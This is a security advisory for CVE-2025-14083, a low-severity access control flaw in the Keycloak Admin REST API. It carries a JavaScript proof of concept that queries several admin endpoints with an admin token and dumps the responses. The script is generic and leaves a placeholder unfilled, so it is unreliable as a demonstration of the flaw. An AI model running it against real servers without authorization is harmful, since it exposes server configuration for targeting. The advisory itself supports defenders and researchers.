Security Vulnerability Report

CVE-2025-14083

Published: 2026-01-21 13:16:03
Last Modified: 2026-04-15 00:35:42

Description

A flaw was found in the Keycloak Admin REST API. This vulnerability allows the exposure of backend schema and rules, potentially leading to targeted attacks or privilege escalation via improper access control.

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
Weakness
CWE-284 (Improper Access Control)

Configurations (Affected Products)


Keycloak < 24.0.5
Keycloak < 23.0.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```javascript
// CVE-2025-14083 PoC - Keycloak Admin REST API Schema Information Disclosure
// Requires high privileges (admin role); the CVSS vector rates this PR:H.
const axios = require('axios');

async function exploitCVE202514083(baseUrl, accessToken, realm = 'master') {
  console.log('[+] Exploiting CVE-2025-14083: Keycloak Admin REST API Information Disclosure');

  // Admin endpoints that may expose backend schema. {realm} is substituted
  // below; {id} (a role id) is left as a placeholder, as in the original.
  const targets = [
    '/admin/realms/{realm}/client-resources/schemas',
    '/admin/realms/{realm}/server-info',
    '/admin/realms/{realm}/components',
    '/admin/realms/{realm}/roles-by-id/{id}'
  ];

  for (const template of targets) {
    const endpoint = template.replace('{realm}', encodeURIComponent(realm));
    try {
      const response = await axios.get(`${baseUrl}${endpoint}`, {
        headers: {
          'Authorization': `Bearer ${accessToken}`,
          'Content-Type': 'application/json'
        },
        timeout: 10000
      });
      if (response.status === 200) {
        console.log(`[+] Discovered schema info at: ${endpoint}`);
        console.log('Response data:', JSON.stringify(response.data, null, 2));
      }
    } catch (error) {
      // axios rejects on non-2xx status and on network/timeout errors
      console.log(`[-] Failed to access ${endpoint}: ${error.message}`);
    }
  }
}

// Usage example
// const target = 'https://keycloak.example.com';
// const token = 'admin-access-token';
// exploitCVE202514083(target, token);
```

References

https://access.redhat.com/errata/RHSA-2026:6477
https://access.redhat.com/errata/RHSA-2026:6478
https://access.redhat.com/security/cve/CVE-2025-14083
https://bugzilla.redhat.com/show_bug.cgi?id=2419086